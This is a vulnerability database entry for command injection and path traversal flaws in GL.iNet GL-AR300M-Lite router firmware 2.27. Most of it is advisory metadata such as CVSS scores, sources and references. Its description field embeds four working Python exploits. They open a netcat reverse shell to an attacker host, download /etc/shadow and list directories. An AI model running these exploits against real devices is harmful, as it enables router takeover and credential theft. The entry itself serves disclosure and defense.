Details of VAR-201903-0453

ID

VAR-201903-0453

CVE

CVE-2019-6275

TITLE

GL.iNet GL-AR300M-Lite Command injection vulnerability in device firmware

Trust: 0.8

sources: JVNDB: JVNDB-2019-002793

DESCRIPTION

Command injection vulnerability in firmware_cgi in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to execute arbitrary code. GL.iNet GL-AR300M-Lite The device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GL-AR300M-Lite is a smart wireless router. A command injection vulnerability exists in GL-AR300M-Lite version 2.27. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal # Date: 15/1/2019 # Exploit Author: Pasquale Turi aka boombyte # Vendor Homepage: https://www.gl-inet.com/ # Software Link: https://www.gl-inet.com/products/gl-ar300m/ # Version: Firmware version 2.27 # CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275 #CVE-2019-6272 PoC (Command injection): import requests rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc '+lhost+' '+lport+' -e /bin/ash`'}) #CVE-2019-6273 (Arbitrary file download) PoC: import requests rhost='RHOST' password='PASSWORD' file_path='/etc/shadow' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies) print r4.text #CVE-2019-6274 (Path Trasversal) PoC: import requests rhost='RHOST' password='PASSWORD' path='/' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies) print r4.text #CVE-2019-6275 (Another command injection): import requests rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,) print r4.text

Trust: 2.43

sources: NVD: CVE-2019-6275 // JVNDB: JVNDB-2019-002793 // CNVD: CNVD-2019-37928 // VULHUB: VHN-157710 // VULMON: CVE-2019-6275 // PACKETSTORM: 151207

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2019-37928

AFFECTED PRODUCTS

vendor:	gl inet	model:	gl-ar300m-lite	scope:	eq	version:	2.27	Trust: 1.8
vendor:	gl ar300m lite	model:	gl-ar300m-lite	scope:	eq	version:	2.27	Trust: 0.6

sources: CNVD: CNVD-2019-37928 // JVNDB: JVNDB-2019-002793 // NVD: CVE-2019-6275

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2019-6275
value:	HIGH
Trust: 1.0
NVD:	CVE-2019-6275
value:	HIGH
Trust: 0.8
CNVD:	CNVD-2019-37928
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201901-730
value:	HIGH
Trust: 0.6
VULHUB:	VHN-157710
value:	MEDIUM
Trust: 0.1
VULMON:	CVE-2019-6275
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2019-6275
severity:	MEDIUM
baseScore:	6.5
vectorString:	AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
CNVD:	CNVD-2019-37928
severity:	MEDIUM
baseScore:	6.5
vectorString:	AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-157710
severity:	MEDIUM
baseScore:	6.5
vectorString:	AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2019-6275
baseSeverity:	HIGH
baseScore:	8.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	2.8
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: CNVD: CNVD-2019-37928 // VULHUB: VHN-157710 // VULMON: CVE-2019-6275 // JVNDB: JVNDB-2019-002793 // CNNVD: CNNVD-201901-730 // NVD: CVE-2019-6275

PROBLEMTYPE DATA

problemtype:

CWE-77

Trust: 1.9

sources: VULHUB: VHN-157710 // JVNDB: JVNDB-2019-002793 // NVD: CVE-2019-6275

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201901-730

TYPE

command injection

Trust: 0.6

sources: CNNVD: CNNVD-201901-730

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-002793

EXPLOIT AVAILABILITY

sources: VULMON: CVE-2019-6275

PATCH

title:

GL-AR300M

url:

https://www.gl-inet.com/products/gl-ar300m/

Trust: 0.8

sources: JVNDB: JVNDB-2019-002793

EXTERNAL IDS

db:	NVD	id:	CVE-2019-6275	Trust: 3.3
db:	PACKETSTORM	id:	151207	Trust: 2.7
db:	EXPLOIT-DB	id:	46179	Trust: 1.8
db:	JVNDB	id:	JVNDB-2019-002793	Trust: 0.8
db:	CNNVD	id:	CNNVD-201901-730	Trust: 0.7
db:	CNVD	id:	CNVD-2019-37928	Trust: 0.6
db:	VULHUB	id:	VHN-157710	Trust: 0.1
db:	VULMON	id:	CVE-2019-6275	Trust: 0.1

sources: CNVD: CNVD-2019-37928 // VULHUB: VHN-157710 // VULMON: CVE-2019-6275 // JVNDB: JVNDB-2019-002793 // PACKETSTORM: 151207 // CNNVD: CNNVD-201901-730 // NVD: CVE-2019-6275

REFERENCES

url:	http://packetstormsecurity.com/files/151207/gl-ar300m-lite-2.2.7-command-injection-directory-traversal.html	Trust: 2.6
url:	https://nvd.nist.gov/vuln/detail/cve-2019-6275	Trust: 2.1
url:	https://www.exploit-db.com/exploits/46179/	Trust: 1.8
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-6275	Trust: 0.8
url:	https://cwe.mitre.org/data/definitions/77.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://www.exploit-db.com/exploits/46179	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-6274	Trust: 0.1
url:	https://www.gl-inet.com/	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies)	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-6273	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies)	Trust: 0.1
url:	https://www.gl-inet.com/products/gl-ar300m/	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-6272	Trust: 0.1
url:	http://'+rhost+'/login.html')	Trust: 0.1

CREDITS

Pasquale Turi

Trust: 0.1

sources: PACKETSTORM: 151207

SOURCES

db:	CNVD	id:	CNVD-2019-37928
db:	VULHUB	id:	VHN-157710
db:	VULMON	id:	CVE-2019-6275
db:	JVNDB	id:	JVNDB-2019-002793
db:	PACKETSTORM	id:	151207
db:	CNNVD	id:	CNNVD-201901-730
db:	NVD	id:	CVE-2019-6275

LAST UPDATE DATE

2024-11-23T21:52:27.635000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2019-37928	date:	2019-10-29T00:00:00
db:	VULHUB	id:	VHN-157710	date:	2019-03-25T00:00:00
db:	VULMON	id:	CVE-2019-6275	date:	2019-03-25T00:00:00
db:	JVNDB	id:	JVNDB-2019-002793	date:	2019-04-22T00:00:00
db:	CNNVD	id:	CNNVD-201901-730	date:	2019-04-01T00:00:00
db:	NVD	id:	CVE-2019-6275	date:	2024-11-21T04:46:21.370

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2019-37928	date:	2019-10-24T00:00:00
db:	VULHUB	id:	VHN-157710	date:	2019-03-21T00:00:00
db:	VULMON	id:	CVE-2019-6275	date:	2019-03-21T00:00:00
db:	JVNDB	id:	JVNDB-2019-002793	date:	2019-04-22T00:00:00
db:	PACKETSTORM	id:	151207	date:	2019-01-16T23:32:22
db:	CNNVD	id:	CNNVD-201901-730	date:	2019-01-17T00:00:00
db:	NVD	id:	CVE-2019-6275	date:	2019-03-21T16:01:07.907